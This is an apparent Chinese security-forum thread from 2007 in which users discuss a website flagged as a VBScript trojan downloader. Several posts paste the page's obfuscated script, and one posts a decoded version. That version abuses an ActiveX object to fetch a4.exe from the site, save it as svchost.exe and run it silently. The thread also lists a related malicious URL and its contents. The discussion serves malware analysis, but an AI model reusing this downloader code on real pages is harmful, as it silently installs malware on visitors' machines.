一个毒网不知道有没有人发过。。。

qq890

已检测到: 木马程序 Trojan-Downloader.VBS.Small.dk URL: http://www.xiaoshuowang.com.cn/url.html
已检测到: 木马程序 Trojan-Downloader.VBS.Small.dk URL: http://www.xiaoshuowang.com.cn/y.html
卡巴报毒

The EQs

LZ发样本吧。。。。。这样最实在

qq890

我的卡巴已经禁止了 没法搞到样本。。。。

The EQs

偶进去之后什么也没有发现。。。。

qq890

Mon Apr 02 16:56:06 2007 url.html 这个

y.html 这个的

<html>
<script language="VBScript">
function rechange(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chr(eval(s(i)))
Next
rechange=t
End Function
t="32,32,32,32,111,110,32,101,114,114,111,114,32,114,101,115,117,109,101,32,110,101,120,116,13,10,32,32,32,32,109,49,61,34,111,98,106,101,99,116,34,13,10,32,32,32,32,109,50,61,34,99,108,97,115,115,105,100,34,13,10,32,32,32,32,109,51,61,34,99,108,115,105,100,58,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,48,67,48,52,70,67,50,57,69,51,54,34,13,10,32,32,32,32,109,52,61,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,13,10,32,32,32,32,109,53,61,34,83,104,101,108,108,46,65,112,112,108,105,99,97,116,

dikex

貌似见过，不过忘了，而那两个都是一样的东西，样本从下面可以看出是http://xiaoshuowang.com.cn/a4.exe


    on error resume next
    m1="object"
    m2="classid"
    m3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    m4="Microsoft.XMLHTTP"
    m5="Shell.Application"
    m6="Scripti"&"ng.Fil"&"eSystemObject"
    Set xasonc = document.createElement(m1)
    xason = "http://xiaoshuowang.com.cn/a4.exe"
    xasonc.setAttribute m2, m3
    xasoni=m4
    Set xasond = xasonc.CreateObject(xasoni,"")
    yhangf="Ado"
    yhangg="db."
    yhangh="Str"
    yhangi="eam"
    xasonf=yhangf&yhangg&yhangh&yhangi
    xasong=xasonf
    set xasona = xasonc.createobject(xasong,"")
    xasona.type = 1
    xasonh="G"&"E"&"T"
    xasond.Open xasonh, xason, False
    xasond.Send
    xason9="svchost.exe"
    set xasonb = xasonc.createobject(m6,"")
    set xasone = xasonb.GetSpecialFolder(2)
    xasona.open
    xason8="xasona.BuildPath(xasona,xason8)"
    xason7="xasonb.BuildPath(xasonb,xason7)"
    xason6="xasonc.BuildPath(xasond,xason6)"
    xason5="xasond.BuildPath(xasonf,xason5)"
    xason4="xasone.BuildPath(xasong,xason4)"
    xason3="xasonf.BuildPath(xasonh,xason4)"
    xason2="xasong.BuildPath(xasoni,xason3)"
    xason1="xasonh.BuildPath(xasong,xason1)"
    xason0="xasoni.BuildPath(xasonk,xason0)"
    xason9= xasonb.BuildPath(xasone,xason9)
    xasona.write xasond.responseBody
    xasona.savetofile xason9,2
    xasona.close
    set xasone = xasonc.createobject(m5,"")
    xasone.ShellExecute xason9,BBS,BBS,"o"&"p"&"e"&"n",0

gggh

卡巴报警...

blueline

使用卡巴的人虽多,了解他的人却不多

银砾石

那个样本有人分析了没？
其中有个关联到一个叫asia.txt的文件，谁能找出来（网络上的）

dikex

http://ctrl.82982.com/asia.txt

里面的内容：
http://asiafind.com/go/g831555-pmem+reg
http://asiafind.com/go/g849358-pmem+reg
http://asiafind.com/go/g849359-pmem+reg
http://asiafind.com/go/g849361-pmem+reg
http://asiafind.com/go/g796367-pmem+reg